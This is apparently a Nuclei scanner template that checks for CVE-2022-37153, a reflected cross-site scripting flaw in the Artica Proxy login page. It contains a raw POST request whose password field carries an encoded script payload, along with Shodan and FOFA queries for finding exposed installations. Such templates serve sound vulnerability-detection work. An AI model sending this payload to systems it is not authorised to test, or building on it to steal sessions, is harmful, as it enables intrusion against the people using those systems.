id: CVE-2022-37153 info: name: Artica Proxy 4.30.000000 - Cross-Site Scripting author: arafatansari severity: medium description: | Artica Proxy 4.30.000000 contains a cross-site scripting vulnerability via the password parameter in /fw.login.php. impact: | Attackers can inject malicious JavaScript through the password parameter in the Artica Proxy login page that reflects back to users, potentially stealing credentials or session tokens when victims submit the login form. remediation: | Upgrade to a patched version of Artica Proxy or apply the vendor-supplied patch to mitigate the vulnerability. reference: - https://github.com/Fjowel/CVE-2022-37153 - https://nvd.nist.gov/vuln/detail/CVE-2022-37153 - https://github.com/SYRTI/POC_to_review - https://github.com/WhooAmii/POC_to_review - https://github.com/k0mi-tg/CVE-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-37153 cwe-id: CWE-79 epss-score: 0.04408 epss-percentile: 0.89198 cpe: cpe:2.3:a:articatech:artica_proxy:4.30.000000:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: articatech product: artica_proxy shodan-query: - http.html:"Artica" - http.html:"artica" fofa-query: body="artica" tags: cve,cve2022,xss,artica,articatech,vkev,vuln http: - raw: - | POST /fw.login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded userfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E matchers-condition: and matchers: - type: word part: body words: - 'Password" value="admin">' - 'Artica Web' condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a0048304602210099a8257f59fa7d3ef159a7b9124b5b6203b93a0562af5c153f782f9258903bd30221009de41aa635d95d3989eb3042f9aa50eda8ed86c70e8c6f31ae4f9d3606f6d74c:922c64590222798bb761d5b6d8e72950